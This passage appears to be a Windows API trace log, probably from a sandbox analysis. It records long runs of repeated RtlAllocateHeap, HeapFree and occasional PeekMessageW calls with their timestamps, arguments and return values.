hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.592] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.594] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.597] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 